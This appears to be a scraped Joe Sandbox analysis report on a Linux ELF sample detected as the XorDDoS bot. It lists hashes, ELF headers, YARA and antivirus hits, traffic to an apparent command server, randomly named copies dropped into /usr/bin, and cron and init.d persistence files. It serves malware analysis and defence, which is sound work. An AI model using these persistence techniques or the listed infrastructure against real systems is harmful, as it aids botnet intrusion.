File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555272
Entropy (8bit):	6.183006615826488
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3:VB2WCH/eMU9Uc8gd49N94BJXQLL4ru
MD5:	E40D4BA6F6AEE3ACD39FAF65F471894A
SHA1:	7DE3D9B9905CC4FDE29D37CA73E2FFCF7BBB0EAB
SHA-256:	0E817A2325C215997DE15851152A66924874739EEFF5DA4B434E5D36C83A76EB
SHA-512:	2479A64B2CDCFF25F87725F6541921FBB4590725F2A8BA7B4827A706AC326FB6124B6C10EA2635502A79081AA2D6B2A29FFEAAA269D320E281E26BB68A30A88F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	554232
Section Header Size:	40
Number of Section Headers:	26
Header String Table Index:	25

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	4
.text	PROGBITS	0x8048110	0x110	0x69ad8	0x0	0x6	AX	16
__libc_freeres_fn	PROGBITS	0x80b1bf0	0x69bf0	0x100f	0x0	0x6	AX	16
__libc_thread_freeres_fn	PROGBITS	0x80b2c00	0x6ac00	0x1db	0x0	0x6	AX	16
.fini	PROGBITS	0x80b2ddc	0x6addc	0x1c	0x0	0x6	AX	4
.rodata	PROGBITS	0x80b2e00	0x6ae00	0x153e0	0x0	0x2	A	32
__libc_subfreeres	PROGBITS	0x80c81e0	0x801e0	0x30	0x0	0x2	A	4
__libc_atexit	PROGBITS	0x80c8210	0x80210	0x4	0x0	0x2	A	4
__libc_thread_subfreeres	PROGBITS	0x80c8214	0x80214	0x8	0x0	0x2	A	4
.eh_frame	PROGBITS	0x80c821c	0x8021c	0x60c8	0x0	0x2	A	4
.gcc_except_table	PROGBITS	0x80ce2e4	0x862e4	0x11b	0x0	0x2	A	1
.tdata	PROGBITS	0x80cf400	0x86400	0x14	0x0	0x403	WAT	4
.tbss	NOBITS	0x80cf414	0x86414	0x2c	0x0	0x403	WAT	4
.ctors	PROGBITS	0x80cf414	0x86414	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x80cf41c	0x8641c	0xc	0x0	0x3	WA	4
.jcr	PROGBITS	0x80cf428	0x86428	0x4	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x80cf42c	0x8642c	0x2c	0x0	0x3	WA	4
.got	PROGBITS	0x80cf458	0x86458	0x8	0x4	0x3	WA	4
.got.plt	PROGBITS	0x80cf460	0x86460	0xc	0x4	0x3	WA	4
.data	PROGBITS	0x80cf480	0x86480	0xb40	0x0	0x3	WA	32
.bss	NOBITS	0x80cffc0	0x86fc0	0x6778	0x0	0x3	WA	32
__libc_freeres_ptrs	NOBITS	0x80d6738	0x86fc0	0x14	0x0	0x3	WA	4
.comment	PROGBITS	0x0	0x86fc0	0x422	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x873e2	0x116	0x0	0x0		1

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x863ff	0x863ff	6.1891	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x86400	0x80cf400	0x80cf400	0xbc0	0x734c	3.6510	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x86400	0x80cf400	0x80cf400	0x14	0x40	2.8414	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2024 00:00:46.232481956 CET	43928	443	192.168.2.23	91.189.91.42
Mar 30, 2024 00:00:50.526921988 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:00:50.692226887 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:00:50.692395926 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:00:50.702145100 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:00:50.931822062 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:00:50.931941032 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:00:51.097502947 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:00:51.097593069 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:00:51.607801914 CET	42836	443	192.168.2.23	91.189.91.43
Mar 30, 2024 00:00:53.399580002 CET	42516	80	192.168.2.23	109.202.202.202
Mar 30, 2024 00:00:57.762095928 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:00:57.762226105 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:06.709570885 CET	43928	443	192.168.2.23	91.189.91.42
Mar 30, 2024 00:01:07.933444023 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:07.933564901 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:18.106435061 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:18.106606007 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:18.996010065 CET	42836	443	192.168.2.23	91.189.91.43
Mar 30, 2024 00:01:23.091273069 CET	42516	80	192.168.2.23	109.202.202.202
Mar 30, 2024 00:01:28.279490948 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:28.279541969 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:32.766079903 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:32.766236067 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:42.938718081 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:42.938851118 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:01:47.664022923 CET	43928	443	192.168.2.23	91.189.91.42
Mar 30, 2024 00:01:53.110655069 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:01:53.110893011 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:03.283453941 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:03.283557892 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:07.769725084 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:07.769814968 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:17.941462994 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:17.941524982 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:28.114608049 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:28.114696026 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:38.287549973 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:38.287638903 CET	57452	1430	192.168.2.23	137.175.88.241
Mar 30, 2024 00:02:42.773982048 CET	1430	57452	137.175.88.241	192.168.2.23
Mar 30, 2024 00:02:42.774341106 CET	57452	1430	192.168.2.23	137.175.88.241

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2024 00:00:43.966420889 CET	38404	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:43.972532034 CET	32841	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.090410948 CET	53	38404	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.090543032 CET	40567	53	192.168.2.23	8.8.4.4
Mar 30, 2024 00:00:44.100373983 CET	53	32841	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.100487947 CET	46980	53	192.168.2.23	8.8.4.4
Mar 30, 2024 00:00:44.218242884 CET	53	40567	8.8.4.4	192.168.2.23
Mar 30, 2024 00:00:44.218569994 CET	44124	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.226557970 CET	53	46980	8.8.4.4	192.168.2.23
Mar 30, 2024 00:00:44.226793051 CET	42881	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.345442057 CET	53	44124	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.347284079 CET	44124	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.355012894 CET	53	42881	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.355285883 CET	42881	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.471714020 CET	53	44124	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.482698917 CET	53	42881	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.482882977 CET	47885	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.610774994 CET	53	47885	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.610904932 CET	46463	53	192.168.2.23	8.8.4.4
Mar 30, 2024 00:00:44.740545034 CET	53	46463	8.8.4.4	192.168.2.23
Mar 30, 2024 00:00:44.740859032 CET	36646	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:44.903744936 CET	53	36646	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:44.903971910 CET	36646	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:45.022449970 CET	53	36646	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:45.022782087 CET	53137	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:50.023983002 CET	43229	53	192.168.2.23	8.8.4.4
Mar 30, 2024 00:00:50.152272940 CET	53	43229	8.8.4.4	192.168.2.23
Mar 30, 2024 00:00:50.152667999 CET	43190	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:50.275538921 CET	53	43190	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:50.279216051 CET	43190	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:50.395298958 CET	53	43190	8.8.8.8	192.168.2.23
Mar 30, 2024 00:00:50.395746946 CET	57067	53	192.168.2.23	8.8.8.8
Mar 30, 2024 00:00:50.526803970 CET	53	57067	8.8.8.8	192.168.2.23

Start time (UTC):	23:00:43
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	/tmp/TmoTjBkSXT.elf
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:00:48
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:00:49
Start date (UTC):	29/03/2024
Path:	/usr/bin/wrvgghkqdd
Arguments:	-
File size:	555283 bytes
MD5 hash:	b46c27dafdcdb69e28d3b3dfb37e3fa6

Start time (UTC):	23:00:54
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:00:59
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:00
Start date (UTC):	29/03/2024
Path:	/usr/bin/rfjhcudkoa
Arguments:	-
File size:	555283 bytes
MD5 hash:	485f8e4db36662caef27f8c74fd55014

Start time (UTC):	23:01:05
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:11
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:16
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:17
Start date (UTC):	29/03/2024
Path:	/usr/bin/ogbruyreel
Arguments:	-
File size:	555283 bytes
MD5 hash:	d44c955c88d57d2d4648924f0f170c84

Start time (UTC):	23:01:22
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:27
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:28
Start date (UTC):	29/03/2024
Path:	/usr/bin/ucawyxmhdv
Arguments:	-
File size:	555283 bytes
MD5 hash:	a0c739b76d925c3beeb3ccba01b8e61d

Start time (UTC):	23:01:33
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:38
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report TmoTjBkSXT.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/TmoTjBkSXT.elf

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/eygutfitxp

/usr/bin/flfoijfhrh

/usr/bin/ljhaidbadz

/usr/bin/mqnheeruxi

/usr/bin/ogbruyreel

/usr/bin/piqqogcjxo

/usr/bin/pmvkvnihjm

/usr/bin/rfjhcudkoa

/usr/bin/ucawyxmhdv

/usr/bin/vwtoogupfm

/usr/bin/wrvgghkqdd

/usr/bin/xilfqxoepi

/usr/bin/ybavzvdbws

/usr/bin/zuuufkngmy

/usr/bin/zygafieftp

/usr/lib/libudev.so

Static File Info

Linux Analysis Report
TmoTjBkSXT.elf

Start time (UTC):	23:01:39
Start date (UTC):	29/03/2024
Path:	/usr/bin/zuuufkngmy
Arguments:	-
File size:	555283 bytes
MD5 hash:	fa9f67ee8844791d0b402596a66ed3aa

Start time (UTC):	23:01:44
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:49
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:01:50
Start date (UTC):	29/03/2024
Path:	/usr/bin/vwtoogupfm
Arguments:	-
File size:	555283 bytes
MD5 hash:	3e698362dcff12549aaff5cd24bee294

Start time (UTC):	23:01:55
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:02:01
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:02:06
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:02:11
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a

Start time (UTC):	23:02:12
Start date (UTC):	29/03/2024
Path:	/usr/bin/mqwsbvfumc
Arguments:	-
File size:	555283 bytes
MD5 hash:	0792f5401a7f40274493616ebffe0d5d

Start time (UTC):	23:02:17
Start date (UTC):	29/03/2024
Path:	/tmp/TmoTjBkSXT.elf
Arguments:	-
File size:	555272 bytes
MD5 hash:	e40d4ba6f6aee3acd39faf65f471894a